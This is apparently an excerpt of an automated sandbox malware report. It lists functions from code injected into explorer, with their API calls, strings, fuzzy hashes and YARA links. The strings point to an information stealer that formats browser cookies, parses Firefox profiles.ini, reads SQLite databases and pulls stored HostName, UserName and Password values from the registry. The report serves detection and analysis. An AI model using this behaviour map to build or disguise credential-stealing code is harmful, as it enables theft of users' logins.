                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C60E1
                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C60EC
                                                      • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 000C6113
                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C618E
                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C61B5
                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C61C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _alldiv$_allrem$memset
                                                      • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                      • API String ID: 2557048445-1989508764
                                                      • Opcode ID: 07b6f24c9f0eccf547c5febb05cd4f55052b92d10405f92d4ab388aa2304a2eb
                                                      • Instruction ID: 502cfbf67b18a962bf2db5a4d44a48d6e4ebfb69120bd35f6eeed1c98243c828
                                                      • Opcode Fuzzy Hash: 07b6f24c9f0eccf547c5febb05cd4f55052b92d10405f92d4ab388aa2304a2eb
                                                      • Instruction Fuzzy Hash: 8CB182B1908B42ABD7399F24CC85F7F7FD4EB80344F24066DF482A62D2E722DD918691
                                                      Function 000DD2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcmp
                                                      • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                      • API String ID: 1475443563-3683840195
                                                      • Opcode ID: 6c12060513ba6a234d0862b8537c34ffa40511fdd26cf7abd0e86ff22dfed634
                                                      • Instruction ID: fe290169e0ce38446e0540a888359f41ab26a7e6bb3f0bce88348ddb2ddbfa1c
                                                      • Opcode Fuzzy Hash: 6c12060513ba6a234d0862b8537c34ffa40511fdd26cf7abd0e86ff22dfed634
                                                      • Instruction Fuzzy Hash: 5E51DF31508700ABC7649F64CC91AABB7E6EB45300F14487FF9969B382E771ED45CBA2
                                                      Function 000C28F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C2AD2
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 000C29E1
                                                      • lstrlen.KERNEL32(00000000), ref: 000C29EC
                                                      • wsprintfA.USER32 ref: 000C2A38
                                                      • lstrlen.KERNEL32(00000000), ref: 000C2A44
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 000C2A6C
                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 000C2A99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                      • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                      • API String ID: 304071051-2605711689
                                                      • Opcode ID: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
                                                      • Instruction ID: 6590630dc8a207623c16ac02fe2defee39dcf0182e8ea07b300ef6e5e98ee674
                                                      • Opcode Fuzzy Hash: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
                                                      • Instruction Fuzzy Hash: 3F519E306083469BC729EF209851FBE77EAAF8A704F04482DF8859B653DB36DC458752
                                                      Function 000C2CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                      • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 000C2D13
                                                      • StrStrIW.SHLWAPI(00000000,Profile), ref: 000C2D45
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,Path,0011637C,?,00000FFF,?), ref: 000C2D68
                                                      • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 000C2D7B
                                                      • lstrlenW.KERNEL32(00000000), ref: 000C2DD8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                      • String ID: IsRelative$Path$Profile$profiles.ini
                                                      • API String ID: 2234428054-4107377610
                                                      • Opcode ID: 9b31e7aee2010a9455d7b08a3ff5ee60b31241b697d1d82932e988be6aab703d
                                                      • Instruction ID: f4fb6b58b6dc00fad621c98ce7d2a5ce087e367b1053133f06ae5d2d601b58fc
                                                      • Opcode Fuzzy Hash: 9b31e7aee2010a9455d7b08a3ff5ee60b31241b697d1d82932e988be6aab703d
                                                      • Instruction Fuzzy Hash: E53170307043029BC664AF709951FAF76E2AFDA700F10843DF946A7693DBB68C869752
                                                      Function 000C48B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                        • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                        • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C4845
                                                        • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C488F
                                                        • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C4897
                                                      • wsprintfW.USER32 ref: 000C49A7
                                                      • wsprintfW.USER32 ref: 000C49B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                      • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                      • API String ID: 2889301010-4273187114
                                                      • Opcode ID: 6d942c896039cf61200882cebd8a9d771eebd6e5605c6dbd17e4a4d5f43adce3
                                                      • Instruction ID: a8b09345e69ff1ba66a2465c1b4e31cc8dab7fd639ae0f15a18bb21264fc0e70
                                                      • Opcode Fuzzy Hash: 6d942c896039cf61200882cebd8a9d771eebd6e5605c6dbd17e4a4d5f43adce3
                                                      • Instruction Fuzzy Hash: 5B310130B043246BC714EB65CC65FAFB6EDEFCA784B05491DB00083282DBB2CC4283A2
                                                      Function 000CF92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.NTDLL(?,?,?,?,00000000), ref: 000CFB32
                                                      • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CFB4D
                                                      • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CFB60
                                                      • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 000CFB95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: -journal$-wal$immutable$nolock
                                                      • API String ID: 3510742995-3408036318
                                                      • Opcode ID: 3a6a27faacbf6c92f88da7b8fe7d6f9162755b9b1709fa4f42044f80face6d1e
                                                      • Instruction ID: c89defe6d0ec5f2e348624996de8f07d2a3918ed32f10c12a661b1774d24ac5e
                                                      • Opcode Fuzzy Hash: 3a6a27faacbf6c92f88da7b8fe7d6f9162755b9b1709fa4f42044f80face6d1e
                                                      • Instruction Fuzzy Hash: EFD1C2B16083429FDB54DF28C881B6EBBE2AF95310F08457DF8998B392DB75D805CB52
                                                      Function 000C7820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$-x0$NaN
                                                      • API String ID: 0-62881354
                                                      • Opcode ID: 1f87efaaba1fee79add35bd9cc08fce12440bd0c0f297eea647123ba31e58b4e
                                                      • Instruction ID: 2846519d4a6e4ce3f269d2e408c114d7b22045f5ff8cdb487a6a7542025fffbd
                                                      • Opcode Fuzzy Hash: 1f87efaaba1fee79add35bd9cc08fce12440bd0c0f297eea647123ba31e58b4e
                                                      • Instruction Fuzzy Hash: A1D1E27060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665C985DF82
                                                      Function 000C78B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -x0$NaN
                                                      • API String ID: 0-3447725786
                                                      • Opcode ID: f1684721801c51636d9e7cfdca5a507d959a7a8fa1aee60da40d0f8f337b0ba3
                                                      • Instruction ID: 740b431186cbd86f8beda1b7881111a455780db19083a412a37fa82ce740fb92
                                                      • Opcode Fuzzy Hash: f1684721801c51636d9e7cfdca5a507d959a7a8fa1aee60da40d0f8f337b0ba3
                                                      • Instruction Fuzzy Hash: 38E1F13060C3828BD7758B288490F6EBBE1AFD5304F28496DF8CA97392D665CD85DF42
                                                      Function 000C7A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -x0$NaN
                                                      • API String ID: 0-3447725786
                                                      • Opcode ID: d11ac3931c9dcbdf64c11220ffdcdad05de039478f86599600d604ead2a3fca6
                                                      • Instruction ID: 49cfba68ecb272604455ab1bf93e6065161ddbaac16dd1229a547ce8d9fa3cb2
                                                      • Opcode Fuzzy Hash: d11ac3931c9dcbdf64c11220ffdcdad05de039478f86599600d604ead2a3fca6
                                                      • Instruction Fuzzy Hash: F2E1D07060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665CD85DB92
                                                      Function 000C7A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -x0$NaN
                                                      • API String ID: 0-3447725786
                                                      • Opcode ID: 5ae9f130e295ecc918f38888d72d74336ee56103749728bc1bf10e18509c401b
                                                      • Instruction ID: 330c28c3a8c259f09a395ee402843b1e1ee634393dab25b9175627596b395c55
                                                      • Opcode Fuzzy Hash: 5ae9f130e295ecc918f38888d72d74336ee56103749728bc1bf10e18509c401b
                                                      • Instruction Fuzzy Hash: 41E1D17060C3828BD7758F288490F6EBBE1AFD9304F28496DF8C997252D665CD85DF82
                                                      Function 000C77F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -x0$NaN
                                                      • API String ID: 0-3447725786
                                                      • Opcode ID: 12c5b43fe113939aaceb655c91f85d05b91aaa74e882c37652a697ff0788fd34
                                                      • Instruction ID: 3e2e44be8ce5833cedf5209992f3b6124b63f10efd9ff1d5558781f21c33e25c
                                                      • Opcode Fuzzy Hash: 12c5b43fe113939aaceb655c91f85d05b91aaa74e882c37652a697ff0788fd34
                                                      • Instruction Fuzzy Hash: 01E1C07060C3828BD7758F288490B6EBBE1AFD9304F28486EF8C997352D665C985DF52
                                                      Function 000C70C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 000C720E
                                                      • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 000C7226
                                                      • _aulldvrm.NTDLL(00000000,00000000,?), ref: 000C727B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _aulldvrm$_aullrem
                                                      • String ID: -x0$NaN
                                                      • API String ID: 105165338-3447725786
                                                      • Opcode ID: 697a355066af11d687313151855d968ba20047efb11636d4341a035609d3aa1b
                                                      • Instruction ID: 095dbadfaab6f1bee5de8b21bd2d2e33f27f2685042f1941eef9401a89e760a0
                                                      • Opcode Fuzzy Hash: 697a355066af11d687313151855d968ba20047efb11636d4341a035609d3aa1b
                                                      • Instruction Fuzzy Hash: EED1D17060C3828BD7758F288490F6EBBE1AFD9304F28486DF8C997352D665C985DF42
                                                      Function 000C898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 000C8AAD
                                                      • _allmul.NTDLL(?,?,0000000A,00000000), ref: 000C8B66
                                                      • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 000C8C9B
                                                      • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 000C8CAE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _allmul$_alldvrm
                                                      • String ID: .
                                                      • API String ID: 115548886-248832578
                                                      • Opcode ID: f11f46264f1b6b686032050282387c4c62a0e9e1c11a8a3e6ee38c67af6638e3
                                                      • Instruction ID: c3149298e95e9918c44611cf8e246113e996e8021401bd2d5001290e625d50f0
                                                      • Opcode Fuzzy Hash: f11f46264f1b6b686032050282387c4c62a0e9e1c11a8a3e6ee38c67af6638e3
                                                      • Instruction Fuzzy Hash: 62D106B190C7858BC724DF088884B7EBBF0FBD5315F04896EF6C696291DBB1C945878A
                                                      Function 000ED684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: ,$7$9
                                                      • API String ID: 2221118986-1653249994
                                                      • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                      • Instruction ID: a93434c1d82605a0d62f71d02381052b5582f2d7eb856f10f18e2b53618c85e9
                                                      • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                      • Instruction Fuzzy Hash: 2B316A715083849FD374DF60D840B8FBBE9AB85340F00892EF98997252EB719549CBA2
                                                      Function 000C1BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(00000000,00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1BCC
                                                      • StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1BF0
                                                      • StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1C05
                                                      • lstrlenW.KERNEL32(00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1C1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: .exe
                                                      • API String ID: 1659193697-4119554291
                                                      • Opcode ID: adc4d391923bc5eb2d88b03df1ecb30fe94817b9363fbb4fc9487718162ebe22
                                                      • Instruction ID: 50335f77f410bd166654ed93a2edc7e36a47193c3495a10abe623a915ced33e0
                                                      • Opcode Fuzzy Hash: adc4d391923bc5eb2d88b03df1ecb30fe94817b9363fbb4fc9487718162ebe22
                                                      • Instruction Fuzzy Hash: 77F0AF30351220AAD3686B34AD85FFE62E5EF06341720882EF042C21A2EB618C818759
                                                      Function 000D2FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _allmul.NTDLL(?,00000000,00000018), ref: 000D316F
                                                      • _allmul.NTDLL(-00000001,00000000,?,?), ref: 000D31D2
                                                      • _alldiv.NTDLL(?,?,00000000), ref: 000D32DE
                                                      • _allmul.NTDLL(00000000,?,00000000), ref: 000D32E7
                                                      • _allmul.NTDLL(?,00000000,?,?), ref: 000D3392
                                                        • Part of subcall function 000D16CD: memset.NTDLL ref: 000D172B
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _allmul$_alldivmemset
                                                      • String ID:
                                                      • API String ID: 3880648599-0
                                                      • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                      • Instruction ID: 551e23537cbf28cbaa0111fc500c72726314421728c196db4da424fe4a208fff
                                                      • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                      • Instruction Fuzzy Hash: 12D19A716083418BDB64DF69C580BAEBBE1AF88704F14492EF98593352DB70DE45CBA3
                                                      Function 000F87FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FOREIGN KEY constraint failed$new$old
                                                      • API String ID: 0-384346570
                                                      • Opcode ID: daca8e84365f49d8f5c49dd0c85ac85ddbcba5b303c768c0027d9fd21ad7cb59
                                                      • Instruction ID: 2c319ea1fd1de208a8c5170f7e236527ba77f4ec40f88acc92fbac28408f6ca7
                                                      • Opcode Fuzzy Hash: daca8e84365f49d8f5c49dd0c85ac85ddbcba5b303c768c0027d9fd21ad7cb59
                                                      • Instruction Fuzzy Hash: 52D15A707083449FD714DB25C481BBFBBE9ABC8740F10891EFA459B292DB74E941DB92
                                                      Function 000C96BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 000C96E7
                                                      • _alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9707
                                                      • _alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9739
                                                      • _alldiv.NTDLL(00000001,80000000,?,?), ref: 000C976C
                                                      • _allmul.NTDLL(?,?,?,?), ref: 000C9798
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _alldiv$_allmul
                                                      • String ID:
                                                      • API String ID: 4215241517-0
                                                      • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                      • Instruction ID: 4ed6ead1f767992a85970b8ac00d8c1b2ddcd2bb71c232838737eade47b59abf
                                                      • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                      • Instruction Fuzzy Hash: 2C213B3111E7655AD7745F555CCCFAF75C9DBE1790F26033EFD01D2292EA528C4080A1
                                                      Function 000DB162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _allmul.NTDLL(?,00000000,00000000), ref: 000DB1B3
                                                      • _alldvrm.NTDLL(?,?,00000000), ref: 000DB20F
                                                      • _allrem.NTDLL(?,00000000,?,?), ref: 000DB28A
                                                      • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 000DB298
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _alldvrm_allmul_allremmemcpy
                                                      • String ID:
                                                      • API String ID: 1484705121-0
                                                      • Opcode ID: 8e40c15e4f4af4a80cefe73363758988e16c4c325756f2a9d9c4a273f9e8da1e
                                                      • Instruction ID: b873d65e9b63ac81ef1da006d040e5bcd4b0801f6b89ffab2c9cb743b954abd3
                                                      • Opcode Fuzzy Hash: 8e40c15e4f4af4a80cefe73363758988e16c4c325756f2a9d9c4a273f9e8da1e
                                                      • Instruction Fuzzy Hash: 1E4139756083019BC758EF19C89196FBBE6AFC8300F45492EF99987352DB31EC45CB62
                                                      Function 000CA67C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _alldiv_allmul
                                                      • String ID: winTruncate1$winTruncate2
                                                      • API String ID: 727729158-470713972
                                                      • Opcode ID: 482d2d8b92fad3d3c1ab01ce1a76c8f065e84a1b23a4b7e17941d4475c5f922e
                                                      • Instruction ID: 4e31deaf33b0b32424edf6d718150874822a81b94d0374523af5d6a0118ce064
                                                      • Opcode Fuzzy Hash: 482d2d8b92fad3d3c1ab01ce1a76c8f065e84a1b23a4b7e17941d4475c5f922e
                                                      • Instruction Fuzzy Hash: 2721AE31305108ABCF648F29CC85FAF77A9EB86318B15822DFD14CB295D634D8508762
                                                      Function 000C1895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetHGlobalFromStream.OLE32(?,?), ref: 000C18A7
                                                      • GlobalFix.KERNEL32(000C4B57), ref: 000C18B6
                                                      • GlobalUnWire.KERNEL32(?), ref: 000C18F4
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C18E8
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
                                                      • String ID:
                                                      • API String ID: 2207111602-0
                                                      • Opcode ID: 48d9cfc7d52d62ceac37f540dd647e4377d6472fa06f58b4765735def5569386
                                                      • Instruction ID: 09e2922cd47ef2ddb887db81ecddd7a3827ca7cc636d0a6fc96dbb30dc5c6181
                                                      • Opcode Fuzzy Hash: 48d9cfc7d52d62ceac37f540dd647e4377d6472fa06f58b4765735def5569386
                                                      • Instruction Fuzzy Hash: 9801AD35204306AF8B059F659D18EDF7BEAEF8A350B10C42EF80583222DF32CD448A20
                                                      Function 000C1953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                      • lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                      • lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                      • lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1475610065-0
                                                      • Opcode ID: 45fb1d534a7621876c678f7d97b25d25c8b83790c70a3726d9c9173cabc42959
                                                      • Instruction ID: 4d30f8789ad44f5c05cacdb9ce11480449c1b5baaced4d312f7891b0442361bf
                                                      • Opcode Fuzzy Hash: 45fb1d534a7621876c678f7d97b25d25c8b83790c70a3726d9c9173cabc42959
                                                      • Instruction Fuzzy Hash: 16E0656270021C1B475477AE5C94EFB76DCCBC96A53050039FA08D3203E966DC0546B0
